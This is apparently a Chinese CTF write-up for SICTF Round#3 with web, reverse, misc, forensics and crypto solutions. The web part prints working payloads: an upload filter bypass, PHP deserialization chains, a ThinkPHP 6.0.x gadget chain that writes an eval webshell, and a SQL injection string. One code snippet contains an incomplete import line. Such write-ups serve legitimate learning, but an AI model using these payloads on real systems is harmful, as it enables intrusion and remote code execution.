SICTF Round#3 Writeup

前言

参赛队员:lemon godyu biu801

->Web方向


100%_upload

图片[1],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

打开

图片[2],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

fuzz一遍发现php被过滤

图片[3],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

改后缀发现内容不能涵盖php

图片[4],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

最后发现jpg png等都能上传 文件内容以<? ?>来取代<?php ?>绕过文件内容拦截

图片[5],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

文件内容被include函数解析

图片[6],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

蚁剑连

图片[7],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

拿flag

图片[8],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

方法2

这里可以先用伪协议读取下upload.php的源码看一下过滤

图片[9],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网
<?php
	if(isset($_FILES['upfile'])){
		$uploaddir = 'uploads/';
		$uploadfile = $uploaddir . basename($_FILES['upfile']['name']);
		$ext = pathinfo($_FILES['upfile']['name'],PATHINFO_EXTENSION);

		$text = file_get_contents($_FILES['upfile']['tmp_name']);


		echo $ext;

		if (!preg_match("/ph.|htaccess/i", $ext)){

			if(preg_match("/<\?php/i", $text)){
				echo "茂夫说:你的文件内容不太对劲哦<br>";
			}
			else{
				move_uploaded_file($_FILES['upfile']['tmp_name'],$uploadfile);
				echo "上传成功<br>路径为:" . $uploadfile . "<br>";
			}
		} 
		else {
			echo "恶意后缀哦<br>";
			
		}
	}
?>

就简单过滤了一下后缀和文件内容,很好绕过

Not just unserialize

图片[10],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网
图片[11],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

这是一道反序列化的题目,链子很好构造,这里有几个魔术方法

__set():魔术方法 __set() 用来给类的实例的不存在的属性或不可访问的属性赋值。

__tostring():当我们使用 echo 语句输出一个对象时,会自动检查一个对象有没有定义 _toString() 方法,如果定义了,就会
输出 __toString() 方法的返回值,如果没有定义,那么会直接抛出一个异常,表明该对象不能直接转换为字符

__isset():__isset()当用isset()或empty()判断一个不可见属性时,自动调用

pop链start->SE->CR->ET

$start=new start();
$SE=new SE();
$CR=new CR();
$ET=new ET();
$CR->newyear='WORRIES';
$CR->last=new $ET();
$SE->year=$CR;
$start->welcome=$SE;
echo base64_encode(serialize($start));

漏洞利用,参考下面这个博客

https://tttang.com/archive/1450/

根据题目描述

图片[12],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

在php中 system()函数调用/bin/sh来执行参数指定的命令,而这个命令的作用是将系统默认的shell解释器从”/bin/sh”更改为”/bin/bash”。所以最后调用的system是bash环境,这样我们可以这样用

图片[13],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

最后的payload为

?go=Tzo1OiJzdGFydCI6Mjp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjI6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo3OiJXT1JSSUVTIjt9fXM6MzoieW91IjtOO30&get[BASH_FUNC_echo%25%25]=() { cat /ffffllllllaaaaaaaaaaaaaaaaaaggggg ; }
图片[14],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

EZ_SSRF

图片[15],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网
图片[16],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

这里逻辑很简单,更改url的地址即可

发现127.0.0.1不可获得 默认地址是/var/www/html

改用file协议读取

<?php
class client{
    public $url;
    public $payload;
    public function __construct()
    {
        $url = "http://127.0.0.1/flag";
        $payload = "system(\"cat /flag\");";
        echo "Exploit";
    }
    public function __destruct()
    {
        get($this->url);
    }
}
$a=new client();
$a->url = "file:///var/www/html/flag.php";
$a->payload="system(\"ls /\");";
print_r(serialize($a));



?>

最终payload:

?Harder=O:6:"client":2:{s:3:"url";s:29:"file:///var/www/html/flag.php";s:7:"payload";s:15:"system("ls /");";}
图片[17],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

Oyst3rPHP(thinkphp6.0.1—6.0.3反序列化漏洞)

图片[18],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网
图片[19],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

主页没有什么信息,我们扫描一下目录

图片[20],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

发现www.zip网站源码,下载下来

图片[21],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网
图片[22],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网
图片[23],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

这是一个thinkphp6.0的框架,我们先看一下主页代码,在app/controller

图片[24],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网
图片[25],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

发现最后有一个反序化接口,google一下,找到了thinkphp v6.03的反序列化漏洞,所以我们要先绕过前面的检测就行 Thinkphp反序列化

图片[26],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

反序列化进if条件

首先是一个md5绕过,这里用了数组绕过发现不行,0e绕过可以 get传参?left=QNKCDZO&right=s878926199a,这两个字符串md5后都是0e开头的,可以绕过php的弱类型比较

下面的是对post传参的key进行正则匹配,不能含有?THINKPHP,但要stripos函数检索到603THINKPHP,这是典型的利用正则匹配的最大回溯次数绕过关键字,我们用到python脚本构造

这里插一嘴两个preg_match一个必须包含一个不能包含,之前打的shctf绕过有类似题->Shctf wp解析 (godyu.com)

图片[27],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网
图片[28],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

最后能成功执行反序列化了,构造payload的poc

<?php
namespace think\model\concern;
trait Attribute
{
    private $data = ["key"=>"echo '<?php eval(\$_POST[1]);?>' > 1.php"];
    private $withAttr = ["key"=>"system"];
}
namespace think;
abstract class Model
{
    use model\concern\Attribute;
    private $lazySave = true;
    protected $withEvent = false;
    private $exists = true;
    private $force = true;
    protected $name;
    public function __construct($obj=""){
        $this->name=$obj;
    }
}
namespace think\model;
use think\Model;
class Pivot extends Model
{}
$a=new Pivot();
$b=new Pivot($a);
echo base64_encode(serialize($b));
?>
图片[29],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

写入一句话木马到1.php中,之后用蚁剑连接,拿到flag

图片[30],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

方法2

出题人意图是需要我们找到原始反序列化漏洞泄露的地方

根据出题人的意图找到第三只生蚝目录地址的判断目录 cat flag

在index末尾处我们可以发现

图片[31],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

找到原始model.php,从此处层层递进造成了thinkphp6.01-6.03反序列化漏洞

图片[32],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网
图片[33],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

具体反序列化漏洞层层造成的过程分析->thinkphp6.01-6.03,,flag藏匿在Oysj3333333r.php里,我们修改此处

图片[34],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

修改后的poc链

<?php
namespace think\model\concern;
trait Attribute
{
    private $data = ["key"=>"tac /Oyst3333333r.php"];
    private $withAttr = ["key"=>"system"];
}
namespace think;
abstract class Model
{
    use model\concern\Attribute;
    private $lazySave = true;
    protected $withEvent = false;
    private $exists = true;
    private $force = true;
    protected $name;
    public function __construct($obj=""){
        $this->name=$obj;
    }
}
namespace think\model;
use think\Model;
class Pivot extends Model
{}
$a=new Pivot();
$b=new Pivot($a);
echo base64_encode(serialize($b));
?>

结合上面绕过递归一把梭python脚本如下:

import requests
url = 'http://yuanshen.life:38758/?left=QNKCDZO&right=240610708'
data = {
    'key': 1020000*"a"+'603THINKPHP',
    'payload': "TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjc6e3M6MjE6IgB0aGlua1xNb2RlbABsYXp5U2F2ZSI7YjoxO3M6MTI6IgAqAHdpdGhFdmVudCI7YjowO3M6MTk6IgB0aGlua1xNb2RlbABleGlzdHMiO2I6MTtzOjE4OiIAdGhpbmtcTW9kZWwAZm9yY2UiO2I6MTtzOjc6IgAqAG5hbWUiO086MTc6InRoaW5rXG1vZGVsXFBpdm90Ijo3OntzOjIxOiIAdGhpbmtcTW9kZWwAbGF6eVNhdmUiO2I6MTtzOjEyOiIAKgB3aXRoRXZlbnQiO2I6MDtzOjE5OiIAdGhpbmtcTW9kZWwAZXhpc3RzIjtiOjE7czoxODoiAHRoaW5rXE1vZGVsAGZvcmNlIjtiOjE7czo3OiIAKgBuYW1lIjtzOjA6IiI7czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6InRhYyAvT3lzdDMzMzMzMzNyLnBocCI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6InRhYyAvT3lzdDMzMzMzMzNyLnBocCI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319"
}
res=requests.post(url=url,data=data)
print(res.text)
图片[35],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

>Reverse方向

[签到]Baby_C++

题目是一个c++逆向,直接拖进IDA按下神奇的F5

图片[36],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

这是main函数功能主要就是从输入流读入字符串与flag字符串进行比对,我们直接找到flag里面存放的数据即可

图片[37],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网
图片[38],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

用cyberchef 16进制转字符串即可得到flag

->Misc方向

签到题

图片[39],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

微信关注签到

真💨签到

图片[40],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

存在密码

图片[41],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

拖进winhex

图片[42],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

得到后来一串数字

随波逐流解有两串比较可疑

Godyu 1:01:56
鸭语Nak解码: TVTTTVTXABYUXTXTXCARYYXAZCYYYUXV=

Godyu 1:02:48
Cisco Type7解码: VTTTVTXABYUXTXTXCARYYXAZCYYYUXV=

不是base64,那就是文字加密成字母

最终发现是鸭语Nak加密

图片[43],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

得到密码解压

图片[44],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

一个图片一个wav音频隐写

因为图片的名字叫steg.jpg猜测可能是wav里隐藏了密码->steghide里

图片[45],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

后来发现了密码尝试steghide解密

givemeyourlagrange密码错误,改lagrange全大写

图片[46],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

判断出有flag.txt拿flag

steghide extract -sf steg.jpg -p givemeyourLAGRANGE
图片[47],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

GeekChallgenge

图片[48],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

nc连接之后 与强网杯的那道题类似

https://www.cnblogs.com/backlion/p/17915922.html

一共有114位需要爆破

图片[49],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

使用gpt->导入python的pwntool模块

导入string模块

使用charset = string.printable涵盖所有的字母字符数字等

将>作为每次结束的标志,定义一个114位的密码储存爆破出的密码字符

对于密码的每一个位置猜测出charset的每一个字符 其余的用X填充 当接受服务器的反馈如果是1说明猜对

将猜对的字符保存到密码列表中,打印出来,并跳出内层循环,继续猜测下一个位置的字符

直到结束

from pwn import *


ip = 'yuanshen.life'
port = 38268


conn = remote(ip, port)
import string


charset = string.printable
GeShi = b'>'


password = [''] * 114
proof = conn.recvuntil(GeShi).decode()
print(proof)

new_charset = ''

for i in range(114):
    for char in charset:
        guess = ''.join(password[:i]) + char + 'X'*(113-i)
        conn.sendline(guess)

        feedback = conn.recvline().decode().strip()

        if '1' == feedback[i+1]:
            print('',guess)
            print(feedback)
            if not char in new_charset:
                new_charset += char
                if len(new_charset) == 5:
                    charset = new_charset
            password[i] = char
            print(f"Found char at position {i}: {char}")
            break


guessed_password = ''.join(password)
print(f"Guessed Password: {guessed_password}")
conn.sendline(guessed_password.encode('ascii'))

feedback = conn.recvline().decode().strip()
print(feedback)
print(conn.recvline().decode())

conn.close()

运行完毕即可拿到flag

->Forensics方向

图片[50],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

查看图片

图片[51],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

谷歌识图

海南省海口市琼山区红城湖

图片[52],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

->Crypto方向

图片[53],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

根据题目描述和密文特征发现是维吉尼亚加密

直接丢去在线网站

图片[54],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

复现

有好几个题都是解了一大半就卡住了,看师傅们文章又学到很多知识,技术有限,努力学习

hacker

图片[55],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网
图片[56],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

审查一下

图片[57],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

给了提示flag在flag表里,但是这里看到被waf过滤

图片[58],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

用不了or此时查不来information_schema表

查不了列名,使用无列名注入SQL注入之无列名注入_sql无列名注入-CSDN博客

buu做题笔记——[网鼎杯 2020 朱雀组]phpweb&[SWPU2019]Web1_网鼎杯知识点-CSDN博客

更改最后为flag即可

payload:

?username=1'union/**/select/**/(select/**/group_concat(`2`)/**/from/**/(select/**/1,2/**/union/**/select*from/**/flag)n)%23
图片[59],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

who who who

who who who的分值还是挺高的 奈何当时在零宽加密之后就卡主了

图片[60],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

有加密

图片[61],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

提示六位密码,进行爆破

图片[62],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

正常打开之后是

图片[63],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

切换其他记事本打开之后是零宽加密

图片[64],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

全部复制到https://yuanfux.github.io/zero-width-web/解密网站

图片[65],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

拿到了

U2FsdGVkX19uvldJ6CGUNff3B28QEdIjZqgUh98K+/0J16ELU8WVQydohw4P5+2M
jbhTLQHNOpcoOd7kSRgy8pwpovCmimdD8M0IbYUeXjNKYePL/WP4PCMaOJHAW3HR
b7IEoDDH1NYh3o5NwMmcFEqy1ujf72VgQIQkaeYFFFE=

这不base64 也不是文本加密 当时判断是带有密钥的加密 以为密钥是shumushizhanan没想到密钥是shumu

图片[66],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

拿到

GTAGAGCTAGTCCTT{GGGTCACGGTTC_GGGTCACGGTTC_GAACGGTTC_GTAGTG_GCTTCA_GTAGACGTGGCGGTG_GTAGACTCA_TATGACCGG_GCTCGGGCT}

DNA加密

图片[67],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网
mapping = {
    'AAA': 'a', 'AAC': 'b', 'AAG': 'c', 'AAT': 'd', 'ACA': 'e', 'ACC': 'f', 'ACG': 'g', 'ACT': 'h', 'AGA': 'i',
    'AGC': 'j', 'AGG': 'k', 'AGT': 'l', 'ATA': 'm', 'ATC': 'n', 'ATG': 'o', 'ATT': 'p', 'CAA': 'q', 'CAC': 'r',
    'CAG': 's', 'CAT': 't', 'CCA': 'u', 'CCC': 'v', 'CCG': 'w', 'CCT': 'x', 'CGA': 'y', 'CGC': 'z', 'CGG': 'A',
    'CGT': 'B', 'CTA': 'C', 'CTC': 'D', 'CTG': 'E', 'CTT': 'F', 'GAA': 'G', 'GAC': 'H', 'GAG': 'I', 'GAT': 'J',
    'GCA': 'K', 'GCC': 'L', 'GCG': 'M', 'GCT': 'N', 'GGA': 'O', 'GGC': 'P', 'GGG': 'Q', 'GGT': 'R', 'GTA': 'S',
    'GTC': 'T', 'GTG': 'U', 'GTT': 'V', 'TAA': 'W', 'TAC': 'X', 'TAG': 'Y', 'TAT': 'Z', 'TCA': '1', 'TCC': '2',
    'TCG': '3', 'TCT': '4', 'TGA': '5', 'TGC': '6', 'TGG': '7', 'TGT': '8', 'TTA': '9', 'TTC': '0', 'TTG': ' ',
    'TTT': '.'
}
input_str = 'GTAGAGCTAGTCCTT{GGGTCACGGTTC_GGGTCACGGTTC_GAACGGTTC_GTAGTG_GCTTCA_GTAGACGTGGCGGTG_GTAGACTCA_TATGACCGG_GCTCGGGCT}'
i = 0
ans = ''
while i < len(input_str):
    if input_str[i] in ('{', '_', '}'):
        ans += input_str[i]
        i += 1
    else:
        ans += mapping[input_str[i:i + 3]]
        i += 3

print(ans)

图片[68],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

ezpyc

图片[69],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

这题太尬了反编译之后的就是flag….

https://www.lddgo.net/string/pyc-compile-decompile

数独都不必分析 m过去就是答案

当时我对着数独就是一顿分析,没想到flag就在眼前

图片[70],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

签到,确信!

题目:

from Crypto.Util.number import *
from enc import flag
m = bytes_to_long(flag)
def gen_keys(bits):
while 1:
p = getPrime(bits)
q = sum([p**i for i in range(7)])
if isPrime(q):
r = getPrime(1024)
n = p*q*r
return p,n
p,n = gen_keys(512)
e = 65537
c = pow(m,e,n)
print(f"n = {n}")
print(f"e = {e}")
print(f"c = {c}")
'''
n = 8361361624563191168612863710516449028280757632934603412143152925186847
72182155287933860895112015763118269976283374309783736874052605573651608013
65205848481131370875818864263351912076888070630240961280014066982179988167
82335655663803544853496060418931569545571397849643826584234431049002394772
87726360304973672307139298982493920236263140916443471593866203879564131418
96287306149782179878681506514913431615264478945692417700903776336020585612
39329450046036247193745885174295365633411482121644408648089046016960479100
22085095300992777895030475433901354101953641388026407445643390767167004928
83179455404954966155311509166470501589360100950374123346625610460161637775
75736952349827380039938526168715655649566952708788485104126900723003264019
51388889794217589000771102628894168725696201279926438754589283276230432028
75925756026836738453999840392723509298032174926175026010056137789761097018
42829008365226259492848134417818535629827769342262020775115695472218876430
55702647128252604254519594406307852327934145919947591120396676275138133427
77162367406370214163113252430285699973033413173945253458791885239489916984
89667794912052436245063998637376874151553809424581376068719814532246179297
85120686250595243730125331366087623113628587721494909499545899763023576463
50595280161490066137202871029418685172445098548756728874450997339099125988
95743707420454623997740143407206090319567531144126090072331
e = 65537
c = 9901744183419446581636823550814851552652879282998060853149162655806576
72513493698560580484907432207730887132062242640756706695937403268682912083
14856886614701124751043983734094533445111012518259539792060207477502241645
49189546236124495846375847163438062559170905259042012848525788342324478217
16829253065610989317909188784426328951520866152936279891872183954439348449
35949152636067115219373526009907719898626436456804683439906451435053832999
1409851310529476700636056111137302461289268502424718207099571586091753768679
93700411738314237400038584470826914946434498322430741797570259936266226325
66781452183842073306133596907124558065718754416177261988951884534863967282
02127090302279999637445937151949285026069104527776877356140334046462370920
67644786266390652682476817862879933305687452549301456541574678459748029511
68552977965305610879564449544251506673107523213073032625840449764655188544
31466294982361917940650501995350631694711125332846631973576359080543436836
37354352034115772227442563180462771041527246803861110504563589660801224223
15206057376038804579169922100755691159779238782941689203741428313149983267
22221574507424606660133319622494158074392584177361289760442725559223443427
25850924271905056434303543500959556998454661274520986141613977331669376614
64726966727659416351604042208961609984931564442464492014590006642683960705
8422686565517159251903275091124418838917480242517812783383

多项式商环

from Crypto.Util.number import *

n = 8361361624563191168612863710516449028280757632934603412143152925186847721821552879338608951120157631182699762833743097837368740526055736516080136520584848113137087581886426335191207688807063024096128001406698217998816782335655663803544853496060418931569545571397849643826584234431049002394772877263603049736723071392989824939202362631409164434715938662038795641314189628730614978217987868150651491343161526447894569241770090377633602058561239329450046036247193745885174295365633411482121644408648089046016960479100220850953009927778950304754339013541019536413880264074456433907671670049288317945540495496615531150916647050158936010095037412334662561046016163777575736952349827380039938526168715655649566952708788485104126900723003264019513888897942175890007711026288941687256962012799264387545892832762304320287592575602683673845399984039272350929803217492617502601005613778976109701842829008365226259492848134417818535629827769342262020775115695472218876430557026471282526042545195944063078523279341459199475911203966762751381334277716236740637021416311325243028569997303341317394525345879188523948991698489667794912052436245063998637376874151553809424581376068719814532246179297851206862505952437301253313660876231136285877214949094995458997630235764635059528016149006613720287102941868517244509854875672887445099733909912598895743707420454623997740143407206090319567531144126090072331
e = 65537
c = 990174418341944658163682355081485155265287928299806085314916265580657672513493698560580484907432207730887132062242640756706695937403268682912083148568866147011247510439837340945334451110125182595397920602074775022416454918954623612449584637584716343806255917090525904201284852578834232447821716829253065610989317909188784426328951520866152936279891872183954439348449359491526360671152193735260099077198986264364568046834399064514350538329990985131052947670063605611113730246128926850242471820709957158609175376867993700411738314237400038584470826914946434498322430741797570259936266226325667814521838420733061335969071245580657187544161772619889518845348639672820212709030227999963744593715194928502606910452777687735614033404646237092067644786266390652682476817862879933305687452549301456541574678459748029511685529779653056108795644495442515066731075232130730326258404497646551885443146629498236191794065050199535063169471112533284663197357635908054343683637354352034115772227442563180462771041527246803861110504563589660801224223152060573760388045791699221007556911597792387829416892037414283131499832672222157450742460666013331962249415807439258417736128976044272555922344342725850924271905056434303543500959556998454661274520986141613977331669376614647269667276594163516040422089616099849315644424644920145900066426839607058422686565517159251903275091124418838917480242517812783383
k = 7

R = Zmod(n)["x"]
while True:
    Q = R.quo(R.random_element(k))
    pp = gcd(ZZ(list(Q.random_element() ^ n)[1]), n)
    if pp != 1:
        qq = sum([pp**i for i in range(k)])
        rr = n // (pp * qq)
        assert n == pp * qq * rr
        break
phi = (pp - 1) * (qq - 1) * (rr - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
print(long_to_bytes(int(m)))
# SICTF{d9428fc7-fa3a-4096-8ec9-191c0a4562ff}
图片[71],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

gggcccddd

from Crypto.Util.number import *
from enc import flag

m = bytes_to_long(flag)

p = getPrime(512)
q = getPrime(512)
n = p*q
e = 65537
c1 = pow(m,e,n)
c2 = pow(233*m+9527,e,n)
print(f'n = {n}')
print(f'c1 = {c1}')
print(f'c2 = {c2}')
print(f'e = {e}')
"""
n = 71451784354488078832557440841067139887532820867160946146462765529262021756492415597759437645000198746438846066445835108438656317936511838198860210224738728502558420706947533544863428802654736970469313030584334133519644746498781461927762736769115933249195917207059297145965502955615599481575507738939188415191
c1 = 60237305053182363686066000860755970543119549460585763366760183023969060529797821398451174145816154329258405143693872729068255155086734217883658806494371105889752598709446068159151166250635558774937924668506271624373871952982906459509904548833567117402267826477728367928385137857800256270428537882088110496684
c2 = 20563562448902136824882636468952895180253983449339226954738399163341332272571882209784996486250189912121870946577915881638415484043534161071782387358993712918678787398065688999810734189213904693514519594955522460151769479515323049821940285408228055771349670919587560952548876796252634104926367078177733076253
e = 65537
"""

运行了很久才能出来

图片[72],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网


easyLattice

图片[73],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

需要配平


from Crypto.Util.number import *

h = 9848463356094730516607732957888686710609147955724620108704251779566910519170690198684628685762596232124613115691882688827918489297122319416081019121038443
p = 11403618200995593428747663693860532026261161211931726381922677499906885834766955987247477478421850280928508004160386000301268285541073474589048412962888947     
L = Matrix(ZZ, [[1, h*2**256],
                [0, p*2**256]])

m = abs(L.LLL()[0][0])
# print(m)
print(long_to_bytes(int(m)))
图片[74],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

superbRSA

就是一个简单的e不互素的共模攻击

图片[75],SICTF Round#3 Writeup,网络安全爱好者中心-神域博客网

from libnum import *
from gmpy2 import *
from

n= 19006830358118902392432453595802675566730850352890246995920642811967821259388009049803513102750594524106471709641202019832682438027312468849299985832675191795417160553379580813410722359089872519372049229233732405993062464286888889084640878784209014165871696882564834896322508054231777967011195636564463806270998326936161449009988434249178477100127347406759932149010712091376183710135615375272671888541233275415737155953323133439644529709898791881795186775830217884663044495979067807418758455237701315019683802437323177125493076113419739827430282311018083976114158159925450746712064639569301925672742186294237113199023
c1= 276245243658976720066605903875366763552720328374098965164676247771817997950424168480909517684516498439306387133611184795758628248588201187138612090081389226321683486308199743311842513053259894661221013008371261704678716150646764446208833447643781574516045641493770778735363586857160147826684394417412837449465273160781074676966630398315417741542529612480836572205781076576325382832502694868883931680720558621770570349864399879523171995953720198118660355479626037129047327185224203109006251809257919143284157354935005710902589809259500117996982503679601132486140677013625335552533104471327456798955341220640782369529
c2= 11734019659226247713821792108026989060106712358397514827024912309860741729438494689480531875833287268454669859568719053896346471360750027952226633173559594064466850413737504267807599435679616522026241111887294138123201104718849744300769676961585732810579953221056338076885840743126397063074940281522137794340822594577352361616598702143477379145284687427705913831885493512616944504612474278405909277188118896882441812469679494459216431405139478548192152811441169176134750079073317011232934250365454908280676079801770043968006983848495835089055956722848080915898151352242215210071011331098761828031786300276771001839021
e1=55
e2=200

_, k1, k2 = gcdext(e1, e2)
g = gcd(e1, e2)
m = pow(pow(c1, k1, n)*pow(c2, k2, n),1,n)
print(long_to_bytes(iroot(Integer(m), 3)[0]))
# SICTF{S0_Great_RSA_Have_Y0u_Learned?}
------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞14 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容